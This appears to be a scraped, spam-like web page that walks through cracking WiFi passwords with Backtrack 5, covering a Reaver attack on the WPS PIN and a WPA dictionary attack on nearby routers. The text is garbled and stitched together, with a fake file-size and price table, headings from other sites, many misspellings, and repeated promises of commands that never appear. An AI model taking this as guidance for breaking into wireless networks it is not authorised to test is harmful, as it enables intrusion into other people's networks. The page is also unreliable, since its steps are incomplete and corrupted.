For educational purposes, in this article, we will see how to crack WiFi password using a famous WiFi cracker, Backtrack 5 R3, which can help patient people to.
|Published (Last):||2 June 2010|
|PDF File Size:||13.30 Mb|
|ePub File Size:||12.58 Mb|
|Price:||Free* [*Free Regsitration Required]|
Backtrack 5 R3 is a notorious Digital Forensic and Intrusion Detection software bundle with a whole lot of tools for Penetration Testing, It is based on Linux and includes plus tools. If you have never used Backtrack before all you really need to know it is the best software to use for Digital Forensics, Intrusion Detection and Penetration Testing.
How to using Fern-WiFi-Cracker on Backtrack 5 R3 | Backtrack Linux Tutorial
There are different types of wireless attacks but in reality only two main types are used. I will go step by step through each. If you have Backtrack 5 installed the first chapter can be skipped directly to the hack you would like to use. The two main types of wireless hacks are WPA dictionary attack, and Reaver. In the past WEP used to be the main encryption used on routers but WEP was notoriously easy to crack and is rarely seen any more.
WPA or WPA2, which are really the same thing, are the way in which routers are now encrypted and much harder to crack. The way you think about these attacks are as important as the attacks themselves.
There is no point and click option. Learning commands and typing them in a terminal window is a must. Buying multiple routers to play with is also a good idea. There are plenty to be found at yard sales and swap meets on the cheap. Different manufactures do different things and have different setups so some have a weakness another will not.
One thing to mention also is that a internal wireless network adapter will not work with Backtrack and wireless penetration testing. This is not because the adapter is not supported it may or may not be. It is because most wireless chipsets do not support packet injections or the things required to do a wireless attack. To see a updated list go here www. Backtrack 5 is free to download and install and can be downloaded here.
There is three ways to install Backtrack, install to the hard drive, boot off a DVD or flash drive, or run it in virtualization. I will talk about how each install works, but if you are new to Backtrack 5 the easiest way is to burn the Backtrack 5 ISO to a DVD or a flash drive and boot from it, of course once the computer restarts data can be lost if not stored correctly. Installing Backtrack 5 to the Hard drive is the same as installing any Operating System, which most everyone is familiar with, by booting from a disk, choosing install and answering questions such as time, date, language, and formatting the disk.
Running Backtrack 5 within virtualization is possibly the most common way. Mainly because a familiar operating system such as Windows can be run at the same time and files transferred between the two easily. This does take up computing resources, and can add another layer of troubleshooting if a problem arises, such as Backtrack not recognizing a USB adapter. If you are just starting out I would start by using a Boot DVD then move on to virtualization later, but this is a personal option and depends on your own experience and knowledge of using Operating Systems.
The download can be found here http: If you have never downloaded a Torrent it is simple. First download and install a Torrent Client, the most popular is Utorrent but there are many.
Then click the link to the torrent and the client will download the file. ISO burning software will be needed. To boot from the DVD put it into the computer drive and check the computer settings to boot from the disk. Most computers have a boot option button to press or will automatically boot the disk.
Crack WiFi Password with Backtrack 5 ( WiFi password hacker)
Once it boots from the DVD it should come to the following menu. The default username and password for Backtrack is backteack then toor. Once logged in and at the command prompt pound symbol type “startx” and this will start the graphical user interface. Any existing Operating System will be wiped out and only Backtrack will be installed if this is done.
For this reason I do not recommend installing to the hard drive unless you have done this before. Backtrack can be setup to dual boot along with an existing Operating System, but explaining how to do a dual boot is more advanced.
If something goes wrong the existing Operating System will be gone or damaged. This is the same as the above booting off the DVD. Double clicking this will install backtrack to the hard drive. Running two operating systems at the same time is quite common now and done relatively easy. For those who do not know VMware is a way to run another operating system virtually within another operating system.
Basically if you are running Windows and want to run a Backtrack 5 install at the same time you can do this with VMware. VMware works very well and as long as you have a fairly recent computer it should run fine.
If you have an older backtrakc or older computer then the ISO may be better. Mainly because a ISO can be burned to a disk or any bootable device and booted from. VMware workstation is not exactly cheap although there is a free version. There is a 30 day free trial for VMware Workstation if you want to check it out. VMware Player doesn’t come with all backtrqck options Workstation does but it does work, and runs Backrtack 5 fine. VMware Player can be downloaded here http: The Backtrack 5 VMware Image file will have to be extracted and will create its own folder with a bunch of files in it.
Only one file will come up because of the. VMX extension click on it and you will be able to play virtual machine and run Backtrack 5.
How to using Fern-WiFi-Cracker on Backtrack 5 R3
Commands we will be using. Reaver is bactkrack of the best tools to come along in a long time. But when WPA became the standard it became much harder to do, using the dictionary attack method was the only real option.
WPS makes it easy for wireless devices to find and connect to a router. The problem with WPS is, it has a flaw in it that lets someone go around the encryption. If a router has WPS enabled then cracking the encryption is no longer necessary. Think of it like a backdoor. If a router has WPS enabled it can usually be cracked backtrrack two to ten hours. Reaver does not attempt to take on the WPA encryption itself but goes around it using WPS backrack then displaying the password.
Such as signal strength, a strong signal is almost a must. Also some routers can crash if too many pins get thrown at it to quickly much like a denial of service attack can crash a PC. Reaver has many option or switches it can use to deal with these problems. The example I am using below is a basic one. The first thing we need to do is bacitrack the wireless USB adapter. Start Backtrack 5 and open two terminal windows.
Run the command “airmon-ng” to see if Backtrack recognizes your wireless USB adapter. It should show “Wlan” along with the chipset, if it doesn’t then some troubleshooting will have to be done until it does. Once the wireless USB adapter is working, we need enable it. To do this run the following command “airmon-ng start wlan0” If all goes well the screen will scroll by with some information then say enabled on mon0.
Finding a WPS enabled router is the next step this used to be hard to do until the “wash” command came along. I believe I have found a fix that has been working for me on both Backtrack 5 and Kali Linux. First make a directory like this. If nothing comes up then no WPS enabled router is within reach. Run the following command to see all access point within your reach. Only do this if the wash command finds nothing Now we can get to using Reaver.
How to crack Wifi password (WPA,WPA2) using Backtrack 5 In Windows 7,8,,10 ~ SoftFed
Wivu the second terminal window run the following command. Reaver will now run and start a brute force attack against the Pin number of the router. It will run until it finds the wireless password usually hours. A dictionary attack is one of the easiest to understand but the least likely to find a password.
This is often the last resort because while it does work it depends on the dictionary used and the computing power. Basically a data capture of the router is captured wirelessly when someone logs into the router. If someone knows the person then they may be able to guess the password but otherwise this can take a long time and never find anything.
If you are stuck using this method, thinking about how the password might be structured will be crucial along with computing power. The data capture could be copied between multiple computers to split the things up. A to F on one G to Z on another. Cloud computing might be a option to bcktrack someone else computing power and so on. There are other ways such as Rainbow Tables, or the video card attack, but the simplest or easiest way to crack WPA is to use Brute Force.
The way this works basically is that there is a large dictionary that you use to throw as many combinations of words as possible at the WPA encryption until it cracks. If the password wify easy then it will find it quick, if it is a long paraphrase with many different number letter combinations then it will be much harder.
Open two terminal windows. Run the command “airmon-ng” to see if your USB adapter shows up, if it doesn’t then some troubleshooting as to why it is not will have to be done. Once you know the adapter is connected and operating run this command to get the adapter into backfrack mode.
Now we want to see what router or access point AP are out there so we run this command. Now we want to leave the original terminal alone and move to the second open terminal.